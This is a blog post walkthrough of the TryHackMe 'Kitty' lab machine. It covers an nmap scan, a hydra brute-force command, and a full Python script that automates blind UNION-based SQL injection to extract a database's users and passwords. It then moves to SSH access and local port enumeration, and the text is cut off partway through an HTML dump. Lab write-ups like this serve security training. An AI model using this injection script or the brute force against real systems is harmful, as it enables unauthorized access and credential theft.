{"id":422,"date":"2024-02-05T20:32:38","date_gmt":"2024-02-06T02:32:38","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=422"},"modified":"2024-04-16T20:54:42","modified_gmt":"2024-04-17T01:54:42","slug":"tryhackme-kitty","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","title":{"rendered":"TryHackMe: Kitty"},"content":{"rendered":"\n

Kitty <\/a>from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine.<\/p>\n\n\n\n

<\/div>\n\n\n\n

NMAP<\/mark><\/h3>\n\n\n\n

We have only two ports open 22 for SSH and HTTP port 80.<\/p>\n\n\n\n

<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>nmap<\/span> <\/span>-p22,80<\/span> <\/span>10.10<\/span>.113.181<\/span> <\/span>-A<\/span> <\/span>-oN<\/span> <\/span>nmap\/kitty<\/span><\/span>\nStarting<\/span> <\/span>Nmap<\/span> <\/span>7.94<\/span>SVN<\/span> ( <\/span>https:\/\/nmap.org<\/span> ) at 2024-02-03 08:26 CST<\/span><\/span>\nNmap<\/span> <\/span>scan<\/span> <\/span>report<\/span> <\/span>for<\/span> <\/span>10.10<\/span>.113.181<\/span><\/span>\nHost<\/span> <\/span>is<\/span> <\/span>up<\/span> (0.20s <\/span>latency<\/span>).<\/span><\/span>\n<\/span>\nPORT<\/span>   <\/span>STATE<\/span> <\/span>SERVICE<\/span> <\/span>VERSION<\/span><\/span>\n22\/tcp<\/span> <\/span>open<\/span>  <\/span>ssh<\/span>     <\/span>OpenSSH<\/span> <\/span>8.2<\/span>p1<\/span> <\/span>Ubuntu<\/span> <\/span>4<\/span>ubuntu0.5<\/span> (Ubuntu <\/span>Linux<\/span>;<\/span> <\/span>protocol<\/span> <\/span>2.0<\/span>)<\/span><\/span>\n|<\/span> <\/span>ssh-hostkey:<\/span> <\/span><\/span>\n|<\/span>   <\/span>3072<\/span> <\/span>b0:c5:69:e6:dd:6b:81:0c:da:32:be:41:e3:5b:97:87<\/span> (RSA)<\/span><\/span>\n|<\/span>   <\/span>256<\/span> <\/span>6<\/span>c:65:ad:87:08:7a:3e:4c:7d:ea:3a:30:76:4d:04:16<\/span> (ECDSA)<\/span><\/span>\n|<\/span>_<\/span>  <\/span>256<\/span> <\/span>2<\/span>d:57:1d:56:f6:56:52:29:ea:aa:da:33:b2:77:2c:9c<\/span> (ED25519)<\/span><\/span>\n80\/tcp<\/span> <\/span>open<\/span>  <\/span>http<\/span>    <\/span>Apache<\/span> <\/span>httpd<\/span> <\/span>2.4<\/span>.41<\/span> ((Ubuntu))<\/span><\/span>\n|<\/span>_http-title:<\/span> <\/span>Login<\/span><\/span>\n|<\/span> <\/span>http-cookie-flags:<\/span> <\/span><\/span>\n|<\/span>   <\/span>\/:<\/span> <\/span><\/span>\n|<\/span>     <\/span>PHPSESSID:<\/span> <\/span><\/span>\n|<\/span>_<\/span>      <\/span>httponly<\/span> <\/span>flag<\/span> <\/span>not<\/span> <\/span>set<\/span><\/span>\n|<\/span>_http-server-header:<\/span> <\/span>Apache\/2.4.41<\/span> (Ubuntu)<\/span><\/span>\nService<\/span> <\/span>Info:<\/span> <\/span>OS:<\/span> <\/span>Linux<\/span>;<\/span> <\/span>CPE:<\/span> <\/span>cpe:\/o:linux:linux_kernel<\/span><\/span>\n<\/span>\nService<\/span> <\/span>detection<\/span> <\/span>performed.<\/span> <\/span>Please<\/span> <\/span>report<\/span> <\/span>any<\/span> <\/span>incorrect<\/span> <\/span>results<\/span> <\/span>at<\/span> <\/span>https:\/\/nmap.org\/submit\/<\/span> <\/span>.<\/span><\/span>\nNmap<\/span> <\/span>done:<\/span> <\/span>1<\/span> <\/span>IP<\/span> <\/span>address<\/span> (1 <\/span>host<\/span> <\/span>up<\/span>) scanned <\/span>in<\/span> 14.36 seconds<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
PORT 80 HTTP<\/mark><\/h4>\n\n\n\n
The webpage has a login form. We do not have any credentials yet to log in. We do have an option to sign up. Let’s try some basic SQL injection payloads and see if we can get in.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
It looks like our attempt to perform SQLi is being detected. We will have to find another way to log in.<\/p>\n\n\n\n
Let’s sign up and see if we get any additional information.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
Let’s log in now with our newly created account.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
There is nothing that stands out on this web page. Looking at the cookies, we see a PHPSESID cookie that is a randomly generated string. The cookie does not seem like it’s encoded in any form. Viewing the page source also did not reveal anything interesting.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
To further understand what vulnerability this web application has, we can try to create another account and then compare the accounts to see if anything odd shows up.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
Let’s login with this account now.<\/p>\n\n\n\n
We get the same page but it is interesting to notice that the cookie value is the same for ishsome1 <\/mark><\/em><\/strong>user as well! Also, from our NMAP scan, we know that the httpOnly flag is not set for the PHPSESSID cookie. At this point, we can’t think of anything else but try to brute-force the login page assuming the user name is kitty<\/mark><\/em><\/strong>.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>hydra<\/span> <\/span>-l<\/span> <\/span>kitty<\/span> <\/span>-P<\/span> <\/span>\/usr\/share\/wordlists\/rockyou.txt<\/span> <\/span>10.10<\/span>.113.181<\/span> <\/span>http-post-form<\/span> <\/span>"<\/span>\/index.php:username=^USER^password=^PASS^&Login=Login:Invalid username or password<\/span>"<\/span>   <\/span><\/span>\nHydra<\/span> <\/span>v9.5<\/span> (c) 2023 by van Hauser\/THC <\/span>&<\/span> <\/span>David<\/span> <\/span>Maciejak<\/span> <\/span>-<\/span> <\/span>Please<\/span> <\/span>do<\/span> <\/span>not<\/span> <\/span>use<\/span> <\/span>in<\/span> <\/span>military<\/span> <\/span>or<\/span> <\/span>secret<\/span> <\/span>service<\/span> <\/span>organizations,<\/span> <\/span>or<\/span> <\/span>for<\/span> <\/span>illegal<\/span> <\/span>purposes<\/span> (this <\/span>is<\/span> <\/span>non-binding,<\/span> <\/span>these<\/span> <\/span>***<\/span> <\/span>ignore<\/span> <\/span>laws<\/span> <\/span>and<\/span> <\/span>ethics<\/span> <\/span>anyway<\/span>).<\/span><\/span>\n<\/span>\nHydra<\/span> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-02-03 08:27:27<\/span><\/span>\n[<\/span>DATA<\/span>]<\/span> max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries <\/span>(<\/span>l:1\/p:14344399<\/span>)<\/span>, <\/span>~<\/span>896525 tries per task<\/span><\/span>\n[<\/span>DATA<\/span>]<\/span> attacking http-post-form:\/\/10.10.113.181:80\/index.php:username=^USER^password=^PASS^<\/span>&<\/span>Login<\/span>=<\/span>Login:Invalid<\/span> <\/span>username<\/span> <\/span>or<\/span> <\/span>password<\/span><\/span>\n[<\/span>STATUS<\/span>]<\/span> 914.00 tries\/min, 914 tries <\/span>in<\/span> 00:01h, 14343485 to <\/span>do<\/span> <\/span>in<\/span> 261:34h, 16 active<\/span><\/span>\n[<\/span>STATUS<\/span>]<\/span> 913.33 tries\/min, 2740 tries <\/span>in<\/span> 00:03h, 14341659 to <\/span>do<\/span> <\/span>in<\/span> 261:43h, 16 active<\/span><\/span>\n[<\/span>80<\/span>][<\/span>http-post-form<\/span>]<\/span> host: 10.10.113.181   login: kitty   password: <\/span><<\/span>REDACTED<\/span>><\/span><\/span>\n1<\/span> <\/span>of<\/span> <\/span>1<\/span> <\/span>target<\/span> <\/span>successfully<\/span> <\/span>completed,<\/span> <\/span>1<\/span> <\/span>valid<\/span> <\/span>password<\/span> <\/span>found<\/span><\/span>\nHydra<\/span> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-03 08:31:03<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
We found the password! Let’s try to log in as kitty now.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
\n
May be brute-forcing is not the way to go. The password we obtained may be the right password but it didn\u2019t do anything good for us<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
After logging in we see the above message. <\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
We get the same message when we try to do an SQL injection attack. This means either we are not on the right track perhaps or there are some filters in place that are detecting the characters used in SQL injection payloads.<\/p>\n\n\n\n
<\/div>\n\n\n\n
We will try a different payload this time.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
\n
I tried sqlmap as well but none of the parameters were injectable according to the tool<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
Foothold<\/mark><\/h3>\n\n\n\n
We may have to do this the old-school way. We can start by enumerating the number of columns.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
If our query is not true, we will get the error message for login.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
If our query is right, we are greeted with a welcome message.<\/p>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/div>\n\n\n\n
Enumerating the entire database will take time if we continue this way. We can automate the process using a Python script below which I got from 0xb0b’s Writeup<\/a>. The below script will give us the name of the database, name of the table, username, and password for the users in the table.<\/p>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
import<\/span> requests<\/span><\/span>\n<\/span>\nprobe <\/span>=<\/span> <\/span>'<\/span>+-<\/span>{}<\/span>(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_<\/span>'<\/span><\/span>\nurl <\/span>=<\/span> <\/span>'<\/span>http:\/\/kitty.thm\/index.php<\/span>'<\/span><\/span>\nheaders <\/span>=<\/span> <\/span>{<\/span><\/span>\n\t<\/span>'<\/span>Host<\/span>'<\/span>:<\/span> <\/span>'<\/span>kitty.thm<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>User-Agent<\/span>'<\/span>:<\/span> <\/span>'<\/span>Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Accept<\/span>'<\/span>:<\/span> <\/span>'<\/span>text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Accept-Language<\/span>'<\/span>:<\/span> <\/span>'<\/span>en-US,en;q=0.5<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Accept-Encoding<\/span>'<\/span>:<\/span> <\/span>'<\/span>gzip, deflate, br<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Content-Type<\/span>'<\/span>:<\/span> <\/span>'<\/span>application\/x-www-form-urlencoded<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Origin<\/span>'<\/span>:<\/span> <\/span>'<\/span>http:\/\/kitty.thm<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Connection<\/span>'<\/span>:<\/span> <\/span>'<\/span>close<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Referer<\/span>'<\/span>:<\/span> <\/span>'<\/span>http:\/\/kitty.thm\/index.php<\/span>'<\/span>,<\/span><\/span>\n\t<\/span>'<\/span>Upgrade-Insecure-Requests<\/span>'<\/span>:<\/span> <\/span>'<\/span>1<\/span>'<\/span><\/span>\n}<\/span><\/span>\ndb_name <\/span>=<\/span> <\/span>''<\/span><\/span>\ntable_name <\/span>=<\/span> <\/span>''<\/span> <\/span><\/span>\nuser_name <\/span>=<\/span> <\/span>''<\/span> <\/span><\/span>\npassword <\/span>=<\/span> <\/span>''<\/span> <\/span><\/span>\n<\/span>\nstate <\/span>=<\/span> <\/span>1<\/span><\/span>\nwhile<\/span> state <\/span><<\/span> <\/span>5<\/span>:<\/span><\/span>\n\t<\/span>for<\/span> elem <\/span>in<\/span> probe<\/span>:<\/span><\/span>\n\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>1<\/span>:<\/span><\/span>\n\t\t\tquery <\/span>=<\/span> <\/span>"<\/span>' UNION SELECT 1,2,3,4 where database() like '<\/span>{sub}<\/span>%';-- -<\/span>"<\/span>.<\/span>format<\/span>(<\/span>sub<\/span>=<\/span>db_name<\/span>+<\/span>elem<\/span>)<\/span><\/span>\n\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>2<\/span>:<\/span><\/span>\n\t\t\tquery <\/span>=<\/span> <\/span>"<\/span>' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = '<\/span>{db}<\/span>' and table_name like '<\/span>{sub}<\/span>%';-- -<\/span>"<\/span>.<\/span>format<\/span>(<\/span>sub<\/span>=<\/span>table_name<\/span>+<\/span>elem<\/span>,<\/span> <\/span>db<\/span>=<\/span>db_name<\/span>)<\/span><\/span>\n\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>3<\/span>:<\/span><\/span>\n\t\t\tquery <\/span>=<\/span> <\/span>"<\/span>' UNION SELECT 1,2,3,4 from <\/span>{tb}<\/span> where username like '<\/span>{sub}<\/span>%' -- -<\/span>"<\/span>.<\/span>format<\/span>(<\/span>sub<\/span>=<\/span>user_name<\/span>+<\/span>elem<\/span>,<\/span>tb<\/span>=<\/span>table_name<\/span>)<\/span><\/span>\n\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>4<\/span>:<\/span><\/span>\n\t\t\tquery <\/span>=<\/span> <\/span>"<\/span>' UNION SELECT 1,2,3,4 from <\/span>{tb}<\/span> where username = '<\/span>{user}<\/span>' and password like BINARY '<\/span>{sub}<\/span>%' -- -<\/span>"<\/span>.<\/span>format<\/span>(<\/span>sub<\/span>=<\/span>password<\/span>+<\/span>elem<\/span>,<\/span>tb<\/span>=<\/span>table_name<\/span>,<\/span>user<\/span>=<\/span>user_name<\/span>)<\/span><\/span>\n\t\t<\/span><\/span>\n\t\tdata <\/span>=<\/span> <\/span>{<\/span><\/span>\n\t\t    <\/span>'<\/span>username<\/span>'<\/span>:<\/span> query<\/span>,<\/span><\/span>\n\t\t    <\/span>'<\/span>password<\/span>'<\/span>:<\/span> <\/span>'<\/span>123456<\/span>'<\/span><\/span>\n\t\t<\/span>}<\/span><\/span>\n\t\tresponse <\/span>=<\/span> requests<\/span>.<\/span>post<\/span>(<\/span>url<\/span>,<\/span> <\/span>headers<\/span>=<\/span>headers<\/span>,<\/span> <\/span>data<\/span>=<\/span>data<\/span>,<\/span>allow_redirects<\/span>=True)<\/span><\/span>\n\t\t<\/span>#print("Size of Response Content:", len(response.content), "bytes")<\/span><\/span>\n\t\t<\/span>if<\/span>(<\/span>len<\/span>(<\/span>response<\/span>.<\/span>content<\/span>)<\/span> <\/span>==<\/span> <\/span>618<\/span>):<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>1<\/span>:<\/span><\/span>\n\t\t\t\tdb_name <\/span>+=<\/span> elem<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>2<\/span>:<\/span><\/span>\n\t\t\t\ttable_name <\/span>+=<\/span> elem\t<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>3<\/span>:<\/span><\/span>\n\t\t\t\tuser_name <\/span>+=<\/span> elem<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>4<\/span>:<\/span><\/span>\n\t\t\t\tpassword <\/span>+=<\/span> elem<\/span><\/span>\n\t\t\t<\/span>break<\/span><\/span>\n\t\t<\/span>if<\/span>(<\/span>elem <\/span>==<\/span> probe<\/span>[-<\/span>1<\/span>]):<\/span><\/span>\n\t\t\t<\/span>print<\/span>(<\/span>'<\/span>\\033<\/span>[K<\/span>'<\/span>)<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>1<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>database:<\/span>\\t<\/span>"<\/span> <\/span>+<\/span> db_name<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>2<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>table:<\/span>\\t\\t<\/span>"<\/span> <\/span>+<\/span> table_name<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>3<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>user:<\/span>\\t\\t<\/span>"<\/span> <\/span>+<\/span> user_name<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>4<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>password:<\/span>\\t<\/span>"<\/span> <\/span>+<\/span> password<\/span>)<\/span><\/span>\n\t\t\tstate <\/span>=<\/span> state <\/span>+<\/span>1<\/span><\/span>\n\t\t<\/span>if<\/span>(<\/span>elem <\/span>!=<\/span> <\/span>"<\/span>\\n<\/span>"<\/span>):<\/span>\t\t<\/span><\/span>\n\t\t\t<\/span>if<\/span> state <\/span>==<\/span> <\/span>1<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>database:<\/span>\\t<\/span>"<\/span> <\/span>+<\/span> db_name<\/span>+<\/span>elem<\/span>,<\/span>end<\/span>=<\/span>'<\/span>\\r<\/span>'<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>2<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>table:<\/span>\\t\\t<\/span>"<\/span> <\/span>+<\/span> table_name<\/span>+<\/span>elem<\/span>,<\/span>end<\/span>=<\/span>'<\/span>\\r<\/span>'<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>3<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>user:<\/span>\\t\\t<\/span>"<\/span> <\/span>+<\/span> user_name<\/span>+<\/span>elem<\/span>,<\/span>end<\/span>=<\/span>'<\/span>\\r<\/span>'<\/span>)<\/span><\/span>\n\t\t\t<\/span>elif<\/span> state <\/span>==<\/span> <\/span>4<\/span>:<\/span><\/span>\n\t\t\t\t<\/span>print<\/span>(<\/span>"<\/span>password:<\/span>\\t<\/span>"<\/span> <\/span>+<\/span> password<\/span>+<\/span>elem<\/span>,<\/span>end<\/span>=<\/span>'<\/span>\\r<\/span>'<\/span>)<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n
This will take some time to finish.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>python3<\/span> <\/span>db.py<\/span>                                      <\/span><\/span>\n<\/span>\ndatabase:<\/span>\t<\/span>mywebsite<\/span><\/span>\n<\/span>\ntable:<\/span>\t\t<\/span>siteusers<\/span><\/span>\n<\/span>\nuser:<\/span>\t\t<\/span>kitty<\/span><\/span>\n<\/span>\npassword:<\/span>\t<\/span>L0ng_Liv3_KittY<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Once we get the password, we can connect to the machine on SSH as user kitty<\/strong><\/em><\/mark><\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Linux-Boxes\/Kitty<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>ssh<\/span> <\/span>kitty@kitty.thm<\/span><\/span>\nkitty@kitty.thm<\/span>'s password: <\/span><\/span>\nWelcome to Ubuntu 20.04.5 LTS (GNU\/Linux 5.4.0-139-generic x86_64)<\/span><\/span>\n<\/span>\n * Documentation:  https:\/\/help.ubuntu.com<\/span><\/span>\n * Management:     https:\/\/landscape.canonical.com<\/span><\/span>\n * Support:        https:\/\/ubuntu.com\/advantage<\/span><\/span>\n<\/span>\n System information disabled due to load higher than 1.0<\/span><\/span>\n<\/span>\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s<\/span><\/span>\n   just raised the bar for easy, resilient and secure K8s cluster deployment.<\/span><\/span>\n<\/span>\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge<\/span><\/span>\n<\/span>\nExpanded Security Maintenance for Applications is not enabled.<\/span><\/span>\n<\/span>\n0 updates can be applied immediately.<\/span><\/span>\n<\/span>\nEnable ESM Apps to receive additional future security updates.<\/span><\/span>\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status<\/span><\/span>\n<\/span>\n<\/span>\nThe list of available updates is more than a week old.<\/span><\/span>\nTo check for new updates run: sudo apt update<\/span><\/span>\n<\/span>\nLast login: Tue Nov  8 01:59:23 2022 from 10.0.2.26<\/span><\/span>\nkitty@kitty:~$ <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Privilege Escalation<\/mark><\/h3>\n\n\n\n
<\/div>\n\n\n\n
Things I always try first when trying to escalate privileges on a Linux machine:<\/p>\n\n\n\n
    \n
  • Run sudo -l<\/mark><\/em><\/strong> to find if our user is in the sudoers group and can run any binaries as root (kitty is not in the sudoers group, unfortunately)<\/li>\n\n\n\n
  • Find SUID binaries (Nothing interesting found)<\/li>\n\n\n\n
  • Run linpeas <\/mark><\/em><\/strong>which did not reveal anything interesting either<\/mark><\/li>\n<\/ul>\n\n\n\n
    Checking for the open ports that are listening locally on the machine, we found some ports.<\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/tmp$<\/span> <\/span>ss<\/span> <\/span>-tunlp<\/span><\/span>\nNetid<\/span>       <\/span>State<\/span>        <\/span>Recv-Q<\/span>       <\/span>Send-Q<\/span>                 <\/span>Local<\/span> <\/span>Address:Port<\/span>                <\/span>Peer<\/span> <\/span>Address:Port<\/span>       <\/span>Process<\/span>       <\/span><\/span>\nudp<\/span>         <\/span>UNCONN<\/span>       <\/span>0<\/span>            <\/span>0<\/span>                      <\/span>127.0<\/span>.0.53%lo:53<\/span>                       <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\nudp<\/span>         <\/span>UNCONN<\/span>       <\/span>0<\/span>            <\/span>0<\/span>                   <\/span>10.10<\/span>.49.10%eth0:68<\/span>                       <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>4096<\/span>                   <\/span>127.0<\/span>.0.53%lo:53<\/span>                       <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>128<\/span>                          <\/span>0.0<\/span>.0.0:22<\/span>                       <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>70<\/span>                         <\/span>127.0<\/span>.0.1:33060<\/span>                    <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>151<\/span>                        <\/span>127.0<\/span>.0.1:3306<\/span>                     <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>511<\/span>                        <\/span>127.0<\/span>.0.1:8080<\/span>                     <\/span>0.0<\/span>.0.0:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>128<\/span>                             [::]:22                          <\/span>[<\/span>::<\/span>]<\/span>:<\/span>*<\/span>                        <\/span><\/span>\ntcp<\/span>         <\/span>LISTEN<\/span>       <\/span>0<\/span>            <\/span>511<\/span>                                <\/span>*<\/span>:80<\/span>                             <\/span>*<\/span>:<\/span>*<\/span>   <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
    <\/div>\n\n\n\n
    Using cURL, we can see what is running on port 8080. We can see that it is a website for ‘Development User Login’.<\/p>\n\n\n\n
    <\/div>\n\n\n\n
    <\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
    kitty@kitty:\/tmp$<\/span> <\/span>curl<\/span> <\/span>127.0<\/span>.0.1:8080<\/span><\/span>\n<\/span>\n<\/span>\n<!<\/span>DOCTYPE<\/span> <\/span>htm<\/span>l<\/span>><\/span><\/span>\n<<\/span>html lang=<\/span>"<\/span>en<\/span>"<\/span>><\/span><\/span>\n<<\/span>head<\/span>><\/span><\/span>\n    <\/span><<\/span>meta<\/span> <\/span>charset=<\/span>"<\/span>UTF-8<\/span>"<\/span>><\/span><\/span>\n    <\/span><<\/span>title>Login<\/title><\/span><\/span>\n    <\/span><<\/span>link<\/span> <\/span>rel=<\/span>"<\/span>stylesheet<\/span>"<\/span> <\/span>href=<\/span>"<\/span>https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css<\/span>"<\/span>><\/span><\/span>\n    <\/span><<\/span>style><\/span><\/span>\n        <\/span>body<\/span>{ <\/span>font:<\/span> <\/span>14<\/span>px<\/span> <\/span>sans-serif<\/span>;<\/span> }<\/span><\/span>\n        <\/span>.wrapper<\/span>{ <\/span>width:<\/span> <\/span>360<\/span>px<\/span>;<\/span> <\/span>padding:<\/span> <\/span>20<\/span>px<\/span>;<\/span> }<\/span><\/span>\n    <\/span><<\/span>\/style><\/span><\/span>\n<<\/span>\/head<\/span>><\/span><\/span>\n<<\/span>body<\/span>><\/span><\/span>\n    <\/span><<\/span>div<\/span> <\/span>class=<\/span>"<\/span>wrapper<\/span>"<\/span>><\/span><\/span>\n        <\/span><<\/span>h2>Development<\/span> <\/span>User<\/span> <\/span>Login<\/span><<\/span>\/h<\/span>2><\/span><\/span>\n        <\/span><<\/span>p>Please<\/span> <\/span>fill<\/span> <\/span>in<\/span> <\/span>your<\/span> <\/span>credentials<\/span> <\/span>to<\/span> <\/span>login.<\/span><<\/span>\/<\/span>p<\/span>><\/span><\/span>\n<\/span>\n<\/span>\n        <\/span><<\/span>form<\/span> <\/span>action=<\/span>"<\/span>\/index.php<\/span>"<\/span> <\/span>method=<\/span>"<\/span>post<\/span>"<\/span>><\/span><\/span>\n            <\/span><<\/span>div<\/span> <\/span>class=<\/span>"<\/span>form-group<\/span>"<\/span>><\/span><\/span>\n                <\/span><<\/span>label>Username<\/label><\/span><\/span>\n                <\/span><<\/span>input<\/span> <\/span>type=<\/span>"<\/span>text<\/span>"<\/span> <\/span>name=<\/span>"<\/span>username<\/span>"<\/span> <\/span>class=<\/span>"<\/span>form-control<\/span>"<\/span>><\/span><\/span>\n            <\/span><<\/span>\/div><\/span>    <\/span><\/span>\n            <\/span><<\/span>div<\/span> <\/span>class=<\/span>"<\/span>form-group<\/span>"<\/span>><\/span><\/span>\n                <\/span><<\/span>label>Password<\/label><\/span><\/span>\n                